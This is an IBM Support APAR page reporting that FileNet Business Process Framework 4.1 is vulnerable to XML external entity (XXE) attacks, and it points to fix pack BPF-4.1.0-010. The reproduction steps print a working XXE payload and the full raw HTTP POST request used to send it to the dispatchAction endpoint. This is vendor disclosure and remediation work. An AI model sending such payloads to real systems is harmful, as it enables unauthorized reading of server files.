IBM Support

PJ40949: BPF IS SUSCEPTIBLE TO XXE (XML EXTERNAL ENTITY) ATTACKS

Subscribe

You can track all active APARs for this component.

APAR status

  • Closed as program error.

Error description

  • How long has the problem been occurring (describe any recent
    changes)?
    Always
    
    Is there a workaround? (Yes ? describe, or No)
    No
    
    What is the impact to the customer/system?
    End customer system has failed their PCI compliance audit which
    is required for their business
    
    Steps to Reproduce:
    Steps tested in-house and taken from customer's attached PDF
    file:
    1. Install and start fiddler2 (http://www.fiddler2.com)
    2. Logon to BPF
    3. Using fiddler post the following 'attack' request as per page
    1 of the customer's PDF:
        <!DOCTYPE foobar [<!ENTITY xxe SYSTEM
    'testfile'>]><Request><Action>&xxe;<Param></Param></Action></Req
    uest>
    4. In fiddler note that the reply received is as per the
    customer's description
    5. Other steps from the customer's document can be followed and
    the results are as described
    
    Attachments:
    Customer PDF describing XXE attack found:
    https://ecurep.mainz.de.ibm.com:444/rest/download/20462,140,702/
    mail20121212-112043-Petri.Pietilainen/BPF_security_issues.pdf
    
    Additional Information:
    The full attack header that was used in house with fiddler2 is
    for step 3 (and subsequent) is:
    
    POST http://cn-site:9080/bpf/dispatchAction HTTP/1.1
    Accept: */*
    Accept-Language: en-ie
    Referer: http://cn-site:9080/bpf/Bp8Main.jsp
    Content-Type: text/xml;charset=UTF-8
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;
    WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR
    3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
    Host: cn-site:9080
    Content-Length: 107
    Connection: Keep-Alive
    Pragma: no-cache
    Cookie:
    bp8-user-name=65|100|109|105|110|105|115|116|114|97|116|111|114;
    JSESSIONID=000022Z9mYzpJsufNvmicQMML1X:-1;
    bpf_childadmin/MainWindow=30%2C1924%2C780%2C1135;
    Administrator/MainWindow=52%2C1909%2C1596%2C1128
    
    <!DOCTYPE foobar [<!ENTITY xxe SYSTEM
    'testfile'>]><Request><Action>&xxe;<Param></Param></Action></Req
    uest>
    
    Configuration/Environment:
    In-house
    Windows 2003
    BPF 4.1.0.7
    
    Windows 7 Client
    MS IE 8.0 32bit
    

Local fix

Problem summary

  • ****************************************************************
    * USERS AFFECTED:                                              *
    * BPF web application users                                    *
    ****************************************************************
    * PROBLEM DESCRIPTION:                                         *
    * BPF is susceptible to XXE (XML eXternal Entity) attacks.     *
    ****************************************************************
    * RECOMMENDATION:                                              *
    * Apply the BPF-4.1.0-010 GA FixPack.                          *
    ****************************************************************
    

Problem conclusion

  • The issue is fixed in BPF-4.1.0-010.
    

Temporary fix

Comments

APAR Information

  • APAR number

    PJ40949

  • Reported component name

    BUS PROC FRAMEW

  • Reported component ID

    5724R7500

  • Reported release

    410

  • Status

    CLOSED PER

  • PE

    NoPE

  • HIPER

    NoHIPER

  • Special Attention

    NoSpecatt

  • Submitted date

    2013-01-28

  • Closed date

    2014-01-23

  • Last modified date

    2014-01-23

  • APAR is sysrouted FROM one or more of the following:

  • APAR is sysrouted TO one or more of the following:

Fix information

  • Fixed component name

    BUS PROC FRAMEW

  • Fixed component ID

    5724R7500

Applicable component levels

  • R410 PSY

       UP



Document information

More support for: FileNet Business Process Framework

Software version: 4.1

Reference #: PJ40949

Modified date: 23 January 2014